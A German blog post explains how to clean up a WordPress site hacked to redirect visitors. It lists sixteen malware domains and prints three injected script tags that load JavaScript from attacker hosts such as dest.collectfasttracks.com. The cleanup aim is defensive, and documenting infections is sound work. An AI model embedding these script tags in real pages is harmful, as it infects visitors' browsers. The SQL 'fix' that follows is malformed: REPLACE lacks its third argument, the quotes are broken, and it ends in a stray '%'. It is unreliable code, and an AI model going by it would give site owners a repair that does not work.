Dein WordPress-Blog wurde gehackt, wenn du dein Blog aufrufst und unfreiwillig auf eine andere Seite weitergeleitet wirst. Malware von folgenden URLs ist momentan sehr häufig zu beobachten (Stand Mai 2020):
- dest.collectfasttracks.com
- stat.trackstatisticsss.com
- ws.stivenfernando.com
- gotosecond2.com
- makesomethird3.com
- wiilberedmodels.com
- bullgoesdown.com
- forwardmytraffic.com
- dns.createrelativechanging.com
- greatinstagrampage.com
- gabriellalovecats.com
- jackielovedogs.com
- tomorrowwillbehotmaybe.com
- activeandbanflip.com
- developsincelock.com
- blueeyeswebsite.com
So behebst du die gehackte Umleitung in WordPress
In deinen Blog-Beiträgen findest du am Ende des Beitrags solch ähnlich aussehende Code-Schnipsel:
<script src="https://hotopponents.site/site.js" type="text/javascript"</script> <script src="https://saskmade.net/head.js?ver=2.0.0" type="text/javascript"></script> <script async="" src="https://dest.collectfasttracks.com/hjsers.js" type="text/javascript"></script>
Wenn du auf einen dieser Code triffst, sind in der Regel alle deine Beiträge mit Malware infiziert. Tipp: Wenn du sehr viele Beiträge hast, kannst du die Malware mit einfacher SQL-Abfrage entfernen. Erstelle bitte vorher ein Datenbank-Backup. Öffne phpMyAdmin, füge diesen SQL-Befehl ein:
UPDATE wp_posts SET post_content = REPLACE(post_content, "<script async="" src="https://dest.collectfasttracks.com/hjsers.js" type="text/javascript"></script>%';
und ersetze vor dem Absenden (!), den rot markierten Codeschnipsel mit dem entsprechenden Schnipsel aus deinem Beitrag. Danach sind alle WordPress-Artikel von der Malware befreit.